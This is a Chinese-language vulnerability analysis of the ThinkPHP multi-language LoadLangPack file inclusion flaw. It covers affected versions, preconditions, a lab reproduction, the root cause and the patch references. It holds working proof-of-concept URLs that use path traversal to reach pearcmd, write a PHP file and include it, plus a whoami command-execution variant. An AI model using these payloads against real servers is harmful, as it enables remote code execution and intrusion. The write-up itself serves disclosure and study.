漏洞范围

• v6.0.0<=ThinkPHP<=v6.0.13
• v5.0.0<=ThinkPHP<=5.0.12
• v5.1.0<=ThinkPHP<=5.1.8

需开启多语言选项，以thinkPHP6版本为例

• 在自定义中间件定义文件app/middleware.php中添加\think\middleware\LoadLangPack::class

php需安装pearcmd拓展,并且开启了register_argc_argv选项

Docker PHP裸文件本地包含综述

在Docker任意版本镜像中，pcel/pear都会被默认安装，安装的路径在/usr/local/lib/php

漏洞复现

环境

使用vulfocus/thinkphp:6.0.12镜像搭建docker环境

poc

#写文件
/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=phpinfo()?>+/tmp/hello.php
#文件包含
/public/index.php?lang=../../../../../../../../tmp/hello

还有一种是/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami并没有尝试成功，好像也是需要利用pearcmd写文件到extend目录还需要一个自定义拓展的样子总感觉怪怪的，参考：【漏洞报送】ThinkPHP开发框架存在命令执行漏洞

原理

• 多语言组件导致的文件包含+pear写文件

查看官方文档关于多语言的解释可见：会首先检查请求的URL或者Cookie中是否包含语言变量

查看新版本补丁可见ThinkPHP5中新增合法性检查

ThinkPHP6新版本补丁\think\middleware\LoadLangPack::detect`中增加了对url、Header、Cookie中设置语言的合法性检查

下面代码分析以ThinkPHP6为例。

\think\middleware\LoadLangPack::handle方法会被自动加载(中间件的入口执行方法)

在detect方法中设置语言之后进入\think\Lang::switchLangSet进行语言切换，路径直接拼接而成

进入\think\Lang::load进行加载，如果文件存在则调用\think\Lang::parse解析

参考

https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099

https://www.kancloud.cn/manual/thinkphp6_0/1037637

thinkphp6_0/1037637](https://www.kancloud.cn/manual/thinkphp6_0/1037637)

https://www.kancloud.cn/manual/thinkphp6_0/1037493